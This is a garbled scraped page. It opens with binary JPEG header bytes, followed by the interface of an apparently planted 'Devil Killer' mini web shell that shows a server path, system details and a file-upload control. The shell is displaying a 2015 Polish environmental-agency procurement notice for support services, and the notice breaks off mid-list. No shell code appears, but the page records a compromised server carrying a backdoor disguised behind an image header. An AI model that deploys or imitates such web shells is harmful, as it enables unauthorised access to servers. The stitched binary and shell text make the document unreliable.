JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150304/47008-N-2015.html

<p class="kh_header"><b>Warszawa: Świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000</b><br>
<b>Numer ogłoszenia: 47008 - 2015; data zamieszczenia: 04.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Ochrony Środowiska , ul. Wawelska 52/54, 00-922 Warszawa, woj. mazowieckie, tel. 22 5792107, faks 22 5792112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gdos.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000 realizowanego w ramach programu priorytetowego 5.1 Wsparcie Ministra Środowiska w zakresie realizacji polityki ochrony środowiska Część 1) Ekspertyzy, opracowania, realizacja zobowiązań międzynarodowych: w podziale na cztery części (Zadania):
1) Część (Zadanie) I Świadczenie usług wsparcia administracyjnego, polegających na:
a)prowadzeniu działań administracyjnych i organizacyjnych wspierających zespół projektowy, w tym m.in. kompletowaniu i archiwizowaniu dokumentacji projektowej, sporządzaniu notatek i protokołów ze spotkań;
b) współpracy przy organizacji spotkań, narad i szkoleń, organizowanych w ramach projektu;
c) udziale w kontroli jakości szkoleń realizowanych w ramach projektu;
d) współpracy przy realizacji wniosków regionalnych dyrektorów ochrony środowiska o dofinansowanie wykonania zadań, w tym: przygotowywaniu projektów decyzji o dofinansowaniu, przygotowywaniu projektów umów trójstronnych, prowadzeniu rejestru złożonych wniosków i zawartych umów trójstronnych;
e) współpracy przy wyborze wykonawców, zgodnie z ustawą PZP oraz wewnętrznym regulaminem udzielania zamówień publicznych, obowiązującym u Zamawiającego, w tym: 
dokumentowaniu rozpoznania rynku potencjalnych wykonawców, przygotowywaniu projektów wniosków w sprawie realizacji zamówienia publicznego, przygotowywaniu projektów umów;
f) współpracy przy monitorowaniu realizacji umów, w tym: bieżących kontaktach roboczych z wykonawcami, monitorowaniu terminowej realizacji umów;
g) obsłudze technicznej procesu wydawniczego, w tym: koordynacji i monitoringu zleceń poligraficznych bezpośredniej współpracy z drukarniami i autorami opracowań, weryfikacji składu publikacji i nanoszeniu korekty wydawniczej zgodnie z normą PN-72/P-55036, współpracy z bibliotekami w zakresie przesyłania obowiązkowych egzemplarzy bibliotecznych zgodnie z ustawą z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (Dz. U. Nr 152, poz. 722, z późn. zm.) i rozporządzeniem Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad i trybu ich przekazywania (Dz. U. Nr 29, poz. 161, z późn. zm.);
h) dystrybucji i prowadzeniu rejestru publikacji;
i) prowadzeniu rejestru rocznych sprawozdań przedkładanych zgodnie z art. 129 ust. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r. poz.1235, z późn. zm.) oraz monitowaniu jednostek, które nie wywiązały się z obowiązku. Zamawiający informuje, że wykonanie Zadania będzie wymagało mobilności i dyspozycyjności w zakresie wykonywania zadań (czynności będące przedmiotem umowy w sprawie zamówienia publicznego, Wykonawca wykonywać będzie w siedzibie Zamawiającego w godzinach pracy obowiązujących u Zamawiającego, a w razie potrzeby także poza tymi godzinami lub/i poza siedzibą Zamawiającego.
Dla usług objętych Zadaniem I przewiduje się maksymalnie 6032 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r.  2016 godz., w 2016 r. 2016 godz., w 2017 r.  2000 godz.).
2). Część (Zadanie) II świadczenie usług typu helpdesk dla użytkowników systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko (Bazy danych ooś), polegających na:
a) obsłudze bazy danych użytkowników (w tym w szczególności: nadawanie uprawnień do modułów Bazy danych ooś, usuwanie błędnych rekordów, zarządzanie kontami użytkowników);
b) pomocy w rozwiązywaniu bieżących problemów użytkowników z funkcjonowaniem Bazy danych ooś;
c) analizie zgłaszanych problemów i uwag pod kątem poszukiwania nowych rozwiązań i funkcjonalności oraz zgłaszaniu ich zespołowi ds. zmian w Bazie danych ooś;
d) sporządzaniu raportów, zestawień (w tym dotyczących ilości i profilu użytkowników i sposobu użytkowania Bazy danych ooś, ilości postępowań); 
e) wsparciu merytorycznym przy obsłudze Bazy danych ooś (w tym w kontaktach z użytkownikami, wykonawcą Bazy danych ooś i z administratorem centralnym w zakresie funkcjonalności, dostępnych w Bazie danych ooś);
f) udziale w kontroli jakości szkoleń w zakresie obsługi Bazy danych ooś.
Dla usług objętych Zadaniem II przewiduje się maksymalnie 6032 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r. 2016 godz., w 2016 r.  2016 godz., w 2017 r.  2000 godz.).
3) Część (Zadanie) III  Obsługa finansowo-księgowa wydatków budżetowych Zamawiającego, jako dysponenta III stopnia, w ramach projektu, w tym regulowanie zobowiązań bezgotówkowych celem prawidłowego realizowania wydatków budżetowych, zgodnie z obowiązującym planem rzeczowo-finansowym Zamawiającego, obejmująca:
a) przyjmowanie, sprawdzanie i opisywanie dowodów księgowych pod względem formalnorachunkowym oraz ich dekretowanie;
b) kontrolę poprawności danych rachunkowych i opisów dowodów pod względem merytorycznym oraz zgodności z zawartymi umowami;
c) wystawianie not księgowych i not korygujących;
d) wprowadzanie dokumentów księgowych do modułu Finansowo-Księgowego;
e) rozliczanie delegacji krajowych;
f) współpracę z komórkami organizacyjnymi Zamawiającego w zakresie związanym z realizacją umowy w sprawie zamówienia publicznego;
g) rozliczanie umów cywilnoprawnych;
h) przygotowywanie dokumentacji rozliczeniowej dotyczącej okresowych i końcowych dofinansowań oraz sprawozdań z realizacji projektu;
i) bieżący monitoring wykorzystania środków w ramach projektu.
Dla usług objętych Zadaniem III przewiduje się maksymalnie 5784 roboczogodzin w trakcie trwania umowy w sprawie zamówienia publicznego (w 2015 r. 1768 godz., w 2016 r. 2016 godz., w 2017 r. 2000 godz.).
4) Część (Zadanie) IV - świadczenie usług wsparcia merytorycznego w zakresie ocen oddziaływania na środowisko ze szczególnym uwzględnieniem aspektów przyrodniczych w postępowaniach ooś, polegających na:
a) wsparciu przy przygotowaniu założeń merytorycznych i weryfikacji treści publikacji mających za zadanie poprawę jakości dokumentacji z zakresu ocen oddziaływania na środowisko;
b) wsparciu przy weryfikacji aktów prawa miejscowego pod kątem konieczności przeprowadzenia strategicznej oceny oddziaływania na środowisko. 
Dla usług objętych Zadaniem IV przewiduje się maksymalnie 288 roboczogodzin w trakcie trwania umowy w sprawie zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie zamówienia publicznego osobami zdolnymi do wykonania zamówienia, które spełniają w szczególności następujące wymagania:
1. Dla Części (Zadania) I (1 osoba):
a) wykształcenie wyższe, 
b) co najmniej 18-miesięczne doświadczenie zawodowe w wykonywaniu prac administracyjno-biurowych, 
c) znajomość ustawy z dnia 3 października 2008 r. udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r. poz. 1235, z późn. zm.),
d) znajomość ustawy z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (Dz. U. Nr 152, poz. 722, z późn. zm.) i rozporządzenia Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad i trybu ich przekazywania (Dz. U. Nr 29, poz. 161, z późn. zm.),
e) umiejętność wykonywania korekty drukarskiej zgodnie z normą PN-72/P-55036,
f) bardzo dobra znajomość środowiska Windows oraz pakietu MS Office,
g)  umiejętność redagowania pism,
h) znajomość zasad obiegu, ewidencjonowania i archiwizacji dokumentów, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. Nr 14 poz. 67);
2. Dla Części (Zadania) II (1 osoba):
a) wykształcenie wyższe z dyscypliny ochrona środowiska bądź inżynieria środowiska bądź ochrona i kształtowanie środowiska, klasyfikowane zgodnie z rozporządzeniem Ministra Nauki i Szkolnictwa Wyższego z dnia 8 sierpnia 2011 r. w sprawie obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych (Dz. U. Nr 179, poz. 1065); 
b) co najmniej 12-miesięczne doświadczenie w pracy administracyjno-biurowej; 
c) znajomość ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r. poz.1235, z późn. zm.) i rozporządzenia Ministra Środowiska z dnia 17 kwietnia 2012 r. w sprawie szczegółowego zakresu informacji o prowadzonych ocenach oddziaływania przedsięwzięcia na środowisko oraz strategicznych ocenach oddziaływania na środowisko (Dz. U. poz. 529);
d)  co najmniej 6-miesięczne doświadczenie w świadczeniu usług typu helpdesk;
e) znajomość ustawy z dnia 13 kwietnia 2007 r. o zapobieganiu szkodom w środowisku i ich naprawie (Dz. U. z 2014 r. poz. 1789);
f) bardzo dobra znajomość środowiska Windows oraz pakietu MS Office.
3. Dla Części (Zadania) III (1 osoba):
a) wykształcenie wyższe,
b) co najmniej 12-miesięczne doświadczenie zawodowe w wykonywaniu prac związanych z obsługą księgową, 
c) bardzo dobra znajomość środowiska Windows oraz pakietu MS Office;
d) umiejętność obsługi programu do ewidencji dokumentów księgowych,
4. Dla Części (Zadania) IV (1 osoba):
a) wykształcenie wyższe z obszaru nauk przyrodniczych zgodnie z Wykazem obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych, stanowiącym Załącznik do rozporządzenia Ministra Nauki i Szkolnictwa Wyższego z dnia 8 sierpnia 2011 r. w sprawie obszarów wiedzy, dziedzin nauki i sztuki oraz dyscyplin naukowych i artystycznych (Dz. U. Nr 179, poz. 1065);
b) co najmniej 12-miesięczne doświadczenie w pracy w zakresie ocen oddziaływania na środowisko;
c) znajomość ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2013 r. poz.1235, z późn. zm.);
d) znajomość ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2013 r. poz. 627, z późn. zm.);
e) najomość ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska (Dz. U. z 2013 r. poz. 1232, z późn. zm.);
f) znajomość ustawy z dnia 14 czerwca 1960 r. - Kodeks postępowania administracyjnego (Dz. U. z 2013 r. poz. 267, z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawcę reprezentuje pełnomocnik należy załączyć pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza należy dołączyć do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Test wiedzy - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Pzp, przewiduje możliwość dokonania zmiany postanowień Umowy w następujących okolicznościach:
1)	zmiany osób wskazanych przez Wykonawcę w ofercie tylko w przypadkach szczególnych (np. śmierć, długotrwała choroba uniemożliwiająca wykonanie przedmiotu Umowy) 
przy spełnieniu łącznie następujących przesłanek: 
a)	jest dopuszczalna pod warunkiem zastąpienia inną osobą o co najmniej 
takich samych kwalifikacjach i doświadczeniu, jakich wymagał Zamawiający 
w SIWZ;
b)	zmiana osób, o których mowa w lit. a, musi być uzasadniona przez Wykonawcę 
na piśmie i zaakceptowana przez Zamawiającego;
c)	w przypadku konieczności zmiany osób biorących udział w realizacji Umowy, Wykonawca powinien przedłożyć Zamawiającemu propozycję zmiany niezwłocznie 
po powzięciu informacji o okolicznościach powodujących zmianę osób, ale nie później niż przed rozpoczęciem realizacji przypisanych zadań przez daną osobę;
2)	zmiany terminu realizacji przedmiotu Umowy, gdy zaistnieje przerwa w realizacji Umowy 
z przyczyn niezależnych od Wykonawcy;
3)	zmiany terminu realizacji przedmiotu Umowy w przypadku wystąpienia innych przyczyn zewnętrznych niezależnych od Stron, skutkujących niemożliwością prowadzenia działań 
w celu wykonania Umowy;
4)	zmniejszenia wynagrodzenia Wykonawcy i zmian zasad płatności wynagrodzenia, 
w szczególności w przypadku zmniejszenia zakresu przedmiotu Umowy;
5)	zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy 
na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie lub wytycznych dotyczących ich realizacji;
6)	zmiany przedmiotu Umowy związanych z rezygnacją przez Zamawiającego 
z realizacji części przedmiotu Umowy;
7)	zmiany terminu realizacji przedmiotu Umowy wynikających z wystąpienia siły wyższej, 
tj. zdarzenia losowego wywołanego przez czynniki zewnętrzne, 
którego nie można było przewidzieć ani mu zapobiec lub przezwyciężyć 
poprzez działanie z dochowaniem należytej staranności, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
8)	zmiany terminu realizacji Umowy determinowanej uwarunkowaniami projektowymi, 
której nie można było przewidzieć w dniu zawarcia Umowy;
9)	zmiany wysokości wynagrodzenia w przypadku:
a)	zmiany stawki podatku od towarów i usług,
b)	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679, z późn. zm.),
c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli będą one miały wpływ na koszty wykonania przedmiotu Umowy przez Wykonawcę. W takiej sytuacji wynagrodzenie, o którym mowa w § 6 ust. 1 i 2 Umowy, może ulec odpowiedniemu zmniejszeniu lub zwiększeniu w zależności od skali wpływu powyższych zmian na koszty realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gdos.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalnej Dyrekcji Ochrony Środowiska, 00-922 Warszawa, ul. Wawelska 52/54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2015 godzina 11:00, miejsce: Generalnej Dyrekcji Ochrony Środowiska, 00-922 Warszawa, ul. Wawelska 52/54, pok. 486 (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zgodnie z art. 83 ust. 2 i 3 ustawy PZP, Zamawiający dopuszcza możliwość złożenia oferty częściowej. Wykonawca może złożyć ofertę częściową tylko na jedną część (Zadanie).
2. Wykonawca jest zobowiązany wykonać zamówienie w następujących terminach:
1) Części (Zadania) I-II - od dnia podpisania umowy w sprawie zamówienia publicznego do dnia 28 listopada 2017 r. 
2) Część (Zadania) III - od dnia podpisania umowy w sprawie zamówienia publicznego do dnia 31 grudnia 2017 r. 
3) Część (Zadania) IV - od dnia podpisania umowy w sprawie zamówienia publicznego do dnia 26 listopada 2015 r.
3. Osoby uprawnione do porozumiewania się z Wykonawcami:
1) Pani Justyna Pokorska - Główny Specjalista w Biurze Administracyjno-Kadrowym, faks 22 579 21 12, e-mail: zampub@gdos.gov.pl;
2) Pani Magdalena Bławdziewicz-Odolińska - Starszy specjalista w Biurze Administracyjno-Kadrowym, faks 22 579 21 12, e-mail: zampub@gdos.gov.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług wsparcia administracyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług wsparcia administracyjnego i merytorycznego w ramach zadania Wsparcie systemu ocen oddziaływania na środowisko i obszary Natura 2000 realizowanego w ramach programu priorytetowego 5.1 Wsparcie Ministra Środowiska w zakresie realizacji polityki ochrony środowiska Część 1) Ekspertyzy, opracowania, realizacja zobowiązań międzynarodowych: w podziale na cztery części (Zadania):
1) Część (Zadanie) I Świadczenie usług wsparcia administracyjnego, polegających na:
a)prowadzeniu działań administracyjnych i organizacyjnych wspierających zespół projektowy, w tym m.in. kompletowaniu i archiwizowaniu dokumentacji projektowej, sporządzaniu notatek i protokołów ze spotkań;
b) współpracy przy organizacji spotkań, narad i szkoleń, organizowanych w ramach projektu;
c) udziale w kontroli jakości szkoleń realizowanych w ramach projektu;
d) współpracy przy realizacji wniosków regionalnych dyrektorów ochrony środowiska o dofinansowanie wykonania zadań, w tym: przygotowywaniu projektów decyzji o dofinansowaniu, przygotowywaniu projektów umów trójstronnych, prowadzeniu rejestru złożonych wniosków i zawartych umów trójstronnych;
e) współpracy przy wyborze wykonawców, zgodnie z ustawą PZP oraz wewnętrznym regulaminem udzielania zamówień publicznych, obowiązującym u Zamawiającego, w tym: 
dokumentowaniu rozpoznania rynku potencjalnych wykonawców, przygotowywaniu projektów wniosków w sprawie realizacji zamówienia publicznego, przygotowywaniu projektów umów;
